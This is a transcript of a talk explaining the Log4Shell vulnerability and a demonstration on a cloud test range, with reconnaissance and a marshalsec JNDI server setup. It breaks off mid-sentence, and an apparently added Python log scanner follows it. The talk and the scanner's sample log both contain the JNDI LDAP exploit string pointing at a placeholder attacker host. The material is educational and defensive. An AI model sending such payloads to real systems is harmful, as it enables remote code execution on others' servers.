
For my next trick I'll make this 2011 MacBook stay connected to the projector for the entire presentation. Welcome, thank you for coming. The title of this discussion is Log4Shell Exploitation and Cloud Range. You've probably read the description, but we'll go over what this is going to be about. I'm going to talk about what is log4j, what was Log4Shell besides something that disrupted a lot of folks' holidays, I'm going to talk about who cares about it, we'll do some demonstrations with exploitation, and then I'll talk about how the range is built that helps demonstrate this exploitation. What I hope is that you'll take away an understanding of what the Log4Shell vulnerability is, why it exists, and that you'll understand this simple, quick and cheap way to set up a test exploitation range in the cloud, so that the next time a more relevant vulnerability comes out you might be in a good spot to test out exploits against it and try out all the stuff you're seeing on infosec Twitter easily and quickly.

But first, why should you care about what I'm saying? Hopefully you're interested in it, but if not, well, just leave. Well, you all stayed, I appreciate that. My name is Carl Sikandik, call sign Rosie. I'm in the Air Force, active duty, so we have weird things like call signs, just like in Top Gun: "there I was, inverted." I'm stationed here in town. I've got a Bachelor's in EE, a Master's in computer science, and I've got experience with cyber ranges. I've used that term a little bit, "range"; what does that mean? It's maybe a little bit more common in the military, but it's also not totally uncommon. I was able to pull this dictionary definition up: a controlled, interactive technology environment where up-and-coming cyber security professionals can learn how to detect and mitigate cyber attacks using the same kind of equipment they will have on the job. So you can run a bunch of VMs in it, you can test it out. A lot of folks have known this as a home lab in the past. Typically that involves buying a server off eBay and setting it up in your basement; my wife would kill me if the basement sounded like an aircraft every time she went down there, and it's San Antonio so we don't have basements anyway. So I've been doing this kind of stuff on the cloud, and that terminology, maybe you call this a cloud range or a home range in the cloud or a home lab in the cloud, I'm just going to call it a range.

All right, so again, here's what we're going to do. First of all, what is Log4Shell? In December 2021 this came out; I think it was on a Friday, and so folks had just left the office and they were probably driving home. I'm sure that they stopped, they pulled over, they looked at their news feed because their phone was exploding, and they saw that this brand new vulnerability came out. Some people probably just turned right around and went back into the office, and other people probably turned off their phone and pretended like they were in Bermuda. But in a little bit more detail, Log4Shell is a remote code execution vulnerability in any application logging using the right versions of the log4j 2 libraries. Specifically, it's got to be logging user inputs; so there are ways to use that log4j 2 library that don't log user inputs, and those would not have really been vulnerable to this. You've got to take that user input and log it. log4j 2 is a very popular logging framework within Java; it's in all kinds of different applications, as we'll see in a second. And to drill down a little bit, if you're not familiar with what remote code execution means, it's just about the worst type of vulnerability you can get. It means that the attacker can execute any code that they want on your computer. So some common examples from today and yesterday are ransomware, keyloggers where they want to steal all your passwords, or maybe they just want to generate a little bit of money on the side with a cryptocurrency miner, but it can be literally anything. In the examples that we're going to do, we're just going to get a shell, a command line prompt, running on the attacked computer, and we're going to send that command line prompt back to us as the attacker so we could take more actions. But it can be literally anything you imagine; you just write a little Java code and you're running.

The root cause of this, again, is that the programmers trusted user input. This goes back to a feature, we'll talk about the feature in just a second, it's a feature in log4j that is able to be misused. Looking in the manual around the time that this vulnerability came out, there's even a little note when this feature was added to log4j that programmers have got to be careful when they use it, to avoid logging user input blindly. So that seems to have just been ignored in a lot of cases, or, you know, programmers didn't read the manual, surprise.

So what is log4j? Let's step back and talk about what this logging framework is real quick. So here we've got an example where a laptop is browsing to a website on a web server written in Java. So it's doing a GET request, and we've got the web server logging a little bit of information using this log4j library; specifically here the web server is logging the User-Agent string. If you don't know, a User-Agent string tells us what kind of browser the person's running; it can tell us if they're on a mobile device or on a desktop or laptop or something else; it can even tell us what operating system they're running. So it's very common to pull in and log those User-Agent strings; it tells you a lot about the people that are visiting your website. In this case nothing bad is happening: log4j is just seeing that User-Agent, passing it along to disk and writing it out like a happy boy.

Well, let's say you're the programmer of that web server and you want to get a little bit more complicated. You want to log, in addition to that User-Agent, the version of Java that your web server is running in. I don't know why you would want to do this, but it is a feature of log4j that you can, and so all the web server has got to do is take that User-Agent string and append a little bit of text, dollar sign, open brace, java colon version, close brace, and then when you pass that to log4j, and you're using the most common method of logging, it's going to replace that dollar sign open brace ... close brace bit with OpenJDK 11.0.13 or whatever version of Java the web server is running. Maybe this is more useful in a non-web-server example, but this was a feature that was added to OpenJDK on purpose, this text substitution feature. It gets a little bit more powerful than just substituting in the version when you get to Log4Shell; this is a great way of demonstrating that power. That log4j text substitution feature can be used to run code, and if the user was not allowed to submit the code that's running, this might be a useful feature in some use case, but unfortunately it's very commonly misused, and thus we get the Log4Shell vulnerability.

So in this case here's a malicious user now on the laptop. You and me are sitting on this laptop and we're going to give this web server a bad day. We've replaced your typical User-Agent string with dollar sign, open brace, jndi colon ldap colon slash attacker server, blah blah blah. Who, that in the back row, can you guys see that? Awesome. The reason I ask is in a little bit we're going to do some demos on the keyboard; that's kind of the more interesting piece. I think I made the text big enough that everyone can see, but if not then please just scoot on forward. So okay, so we've replaced your typical User-Agent string with this malicious one. Now the web server gets it, it tries to log that User-Agent still, and when log4j gets that malicious User-Agent string the first thing it does is it says, oh, I need to go out to a JNDI server, speak this little bit of LDAP JNDI protocol, and I need to ask it where to get some code from. So it makes a connection out to the attacker's server, it calls out to that JNDI LDAP server and it asks, hey, where is this little bit of code named, in this case, log4jcallback; you can call it whatever you want. And then the JNDI LDAP server responds, hey, here's a web server where you can go pick up this malicious code. So that's what attacker:8080 is: it's that JNDI LDAP server, which is a specific weird language, responding, hey, here's a web server where you can download the code. So then log4j says, all right, now I got my web server, I'm going to go there, I'm going to download this malicious code, it doesn't know it's malicious, I'm going to download this code and I'm going to run it. So it calls out to the attacker web server, which is attacker:8080 in this case; the attacker web server is going to oblige and give it back log4jcallback.class, and then log4j is going to run it, and that's going to pop a shell and return it to the attacker in the example case. So multiple stages of this attack, none of them are very complicated, and tooling is already built to allow all of these to happen really easily.

So what is affected by this vulnerability? CISA put out a great GitHub site kind of the next day, so real quick, where they started taking user input on every server that companies and people reported was vulnerable to this. Minecraft: if you watched YouTube there were a lot of videos of people popping Minecraft servers because it included log4j logging and it was very vulnerable. Elasticsearch and Logstash: there are a lot of caveats to that one about its vulnerability, but that was widely seen as directly vulnerable to this, and those two are embedded in a ton of other products, so then all those other products that embed Elasticsearch and Logstash for whatever reason were also seen as vulnerable. A number of other tools: Solr and Jetty are the ones that we're going to be using in the demonstration. So Solr is not a product I've used before Log4Shell; it's an Apache search engine, it looks like something that enterprises might use. And Jetty is a web server by JetBrains, and there's a few caveats to its vulnerability as well, but it's just a neat web server. Ghidra, the NSA's reverse engineering tool, was also vulnerable to this. A ton of VMware products. The SolarWinds folks had another bad Christmas, although certainly less bad than the year prior. And just a ton of stuff is on that list. It used to be a really massive list and now they've broken it out by alphabet so it's easier to browse, but you can go there and check out the full list, see if anything you've got on there is vulnerable.

So really, is all this stuff really vulnerable? Well, if you're running a JDK version newer than October 2018 there's an environment variable that automatically makes this a lot more difficult to exploit. It seemed like that was the recommended fix at first, and then attackers played cat and mouse and they found some ways around that. So then they recommend, well, set this setting in the log4j configuration; log4j is extremely configurable, it's really nice in that way. It seemed like that was a good fix for a little while, but of course attackers seem to find ways around that as well. And then Elasticsearch: the major caveat to Elasticsearch is that for a few years now they've been building Elasticsearch with a Java tool that adds a lot of automatic security features. I'm not a Java programmer, I'm sorry, but it's built in a way that disallows JNDI execution, and so I've had a couple people tell me that Elasticsearch is vulnerable; certainly you can get those first stages of callbacks from it. I haven't seen anybody actually get remote code execution on Elasticsearch, so feel free, if you've got a counter demo to that then please let me know, I would love to see it. And I wouldn't bet on any of these as solid protections; just update your stuff. The fixes are out now.

Okay, so we've talked about log4j, we've talked about what Log4Shell is, we've talked about how it works, but there's nothing better than trying it out for ourselves. And so over the holidays I had a little time off and I spent the evenings after my wife and daughter went to bed messing around with this. And so, you know, huge thanks to my wife for just ignoring all my BS around this; this is just a love thing. In order to mess around with this vulnerability I set up a range that looks just like this on AWS. So there's three computers, three EC2 instances that I stood up on AWS. The Kali box is running Kali Linux. Solr is just running Debian, and then I've installed Solr and Jetty, and I can install any other service that's got a Docker container associated with it on that Debian box, excuse me, and we could go further, we could install anything we want. Those are both connected; they're on separate subnets, but they're connected in the same virtual private cloud on AWS so they can talk to each other easily through something similar to network routing. The only way that either of those can talk to the internet, or that the internet can talk to them, is through that jump host there. That's running Guacamole on it; that's an Apache product that gives you a remote desktop interface to VNC remote desktop, so it's just a great front end. And in this demonstration the first thing we're going to do is connect to that Guacamole server running on the jump host, and then we'll be able to demonstrate exploitation from the Kali box across to the Solr host. So let's do that; that's the fun part.

Now this is the part where I might screw up this connection, but I'm going to try really hard not to. So you can't see this, but the code for all this was provided on a GitHub repo. You can download it, there's instructions, so you can easily set this up and run it yourself. I wrote those instructions mostly as a reminder to me in a year when it's the holidays again and of course no new vulnerabilities will be out and I'll want to play with them and I'll forget how to do all this. But one of the things it requires is a domain name from FreeDNS, afraid.org; those guys are fantastic. And so this one is like log4jrange.lee.mx, and Guacamole just presents a login, and this gets set up automatically during provisioning and configuration. So I'll go ahead and log into this. I actually set this up last night to hopefully appease the demo gods; we'll see how well that goes. It seemed to still be working a little while ago. After this part we'll go through redeployment so you can see that all work. But on here we've got access to the Solr box and we've got access to the Kali box. So again, this is just a regular Debian install with a couple containers running on it. When I ran sudo docker ps, I apologize this text is a little small, but it's running essentially two Docker containers: a vulnerable Jetty server, which I had to create a custom container for to make it vulnerable, because with the default install parameters of Jetty it is not vulnerable, it's just some configuration options that make it vulnerable; and then Solr. This is the default Solr Docker container that you can grab from Docker Hub. Solr is listening on port 8983 and Jetty's listening on port 80.

But we don't have to know that; we can switch over to our Kali box. Awesome. And you know, if we were the attacker, all we might know is, oh, right there, all we might know is kind of the network layout of our target organization, and of course we'd know our own IP address. But we see our target organization is in the 10.18.66 range, so we can hop on over to our Kali box and we can do an nmap -sn 10.18.66.*, and we'll just do kind of a ping sweep of that whole little bit of the network and see if there are any open boxes there, and then we can scan. There's only one box, so we should get that one back. And while we're doing that let's look at what our IP address is: 10.18.225. I'm going to go ahead and open a new tab. Once we get that back we're going to want to port scan that box more clearly; I think it's .163. I'm cheating a little bit because again I tested this out last night to make sure it's good, so we should get, in another minute or so, a little return here that says it's .163 that's vulnerable. But if we do a port scan against .163, just for time, we can see SSH, HTTP, that's going to be that Jetty web server, and some VNC and X11 ports are open. If this was a real server that VNC might be much more restricted than it is, we might not be able to port scan it, and X11 would be off limits as well. So some changes you might want to make if you're looking for a little bit more realism, but here we're looking for a basic ability to demonstrate this vulnerability. So if we just go to that IP address directly and we look at what's on port 80 we see it's the Jetty server, and if we go to that Solr port, 8983, we're going to see it's Solr, just as we would expect from this Kali box. So that Solr port didn't show up in the nmap scan; anybody know why? Yep, it's not in the default range, exactly. 8983 is not one of the default ports nmap is going to scan. If you were an attacker looking for specifically Solr boxes then of course it would be in your port scanning range, and here we own the server, so we've got an easier time. You can see here nmap was able to find that one running box on the subnet.

All right, so we found our target. Now from the attacker station we need to set up those different servers that are going to get us to exploitation, and just because I'm a cheater, I've put a bunch of the commands and everything that you need to do this right into the GitHub repo. So we can just go there from the Kali box. It's got some information on deploying the range, setting it all up; it's got all this information here, zoom in a little bit here; it's got the URLs on the Solr server that are going to get us execution, it's got the URL, or User-Agent string, on the Jetty box that's going to give us exploitation, and it's kind of got a step-by-step walkthrough of how to do this. So if you remember, that first server that we need is that JNDI LDAP server. Well, as part of provisioning and configuring this range I download some other dude's code to do this, this marshalsec guy, and I found out about this by Googling around and finding an awesome SANS tutorial on this. So thank you SANS, thank you marshalsec guy. That information is located there, and they do a little bit more of a deep dive; especially the marshalsec guy does a good deep dive into what this protocol is and how it works. So just to demonstrate exploitation, though, we need to cd into this marshalsec directory and then we need to run the Java server, the JNDI server that's going to get us... okay. So as part of this command you can see it's just executing a jar, but we've got to replace this Kali box IP address with what our IP address is, which is 225.8. I'm glad I checked; I screwed that up. Thank you. 10.18.225.8. So what this is going to do is start up this marshalsec server. It's going to tell anybody that's connecting, asking for the address where it can download this malicious code, give them 10.18.225.8:8080 and tell them to download log4jcallback. We can name it whatever we want, but that's t
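As an added example (not code from the talk or its GitHub repo), here is a small defensive scanner that reads constructed web-server access-log lines and flags the log4j lookup syntax in the User-Agent field that the talk walks through; the log layout, the sample lines and the ATTACKER-HOST name are assumptions, and any `${...}` in user input is treated as worth a look because legitimate browsers never send it.

```python
"""Added example (not the talk's code or its GitHub repo): scan access-log lines
for log4j lookup syntax in the User-Agent field, the Log4Shell vector above.
The log layout, sample lines and ATTACKER-HOST are constructed placeholders."""
import re

# Constructed combined-style access log: a benign browser line, the
# ${java:version} substitution from the talk, and the malicious JNDI lookup.
SAMPLE_LOG = r'''
10.18.66.10 - - [10/Dec/2021:17:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/95.0"
10.18.66.10 - - [10/Dec/2021:17:01:05 +0000] "GET /solr/ HTTP/1.1" 200 2048 "-" "curl/7.74.0 ${java:version}"
10.18.225.8 - - [10/Dec/2021:17:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://ATTACKER-HOST:1389/log4jcallback}"
'''.strip()

# client ident user [timestamp] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def extract_lookups(text):
    """Return each outermost ${...} expression in text, honoring nesting so a
    lookup wrapped inside another lookup still comes back as one unit."""
    found, depth, start, i = [], 0, 0, 0
    while i < len(text):
        if text.startswith("${", i):
            if depth == 0:
                start = i
            depth += 1
            i += 2
            continue
        if text[i] == "}" and depth > 0:
            depth -= 1
            if depth == 0:
                found.append(text[start:i + 1])
        i += 1
    return found


def classify(ua):
    """'critical' for a JNDI lookup, 'warn' for any other lookup syntax (user
    input should never carry ${...} at all), 'ok' otherwise."""
    lookups = extract_lookups(ua)
    if any("jndi" in lk.lower() for lk in lookups):
        return "critical"
    return "warn" if lookups else "ok"


def scan_log(log_text):
    """Return (client, severity, lookups) for every line that fits LOG_RE."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:  # skip lines that do not fit the constructed format
            continue
        ua = m.group("ua")
        findings.append((m.group("client"), classify(ua), tuple(extract_lookups(ua))))
    return findings
```

Running `scan_log(SAMPLE_LOG)` reports the browser line as ok, the `${java:version}` line as warn and the JNDI line as critical, with the source client address alongside each so the finding can be pivoted into the rest of the logs.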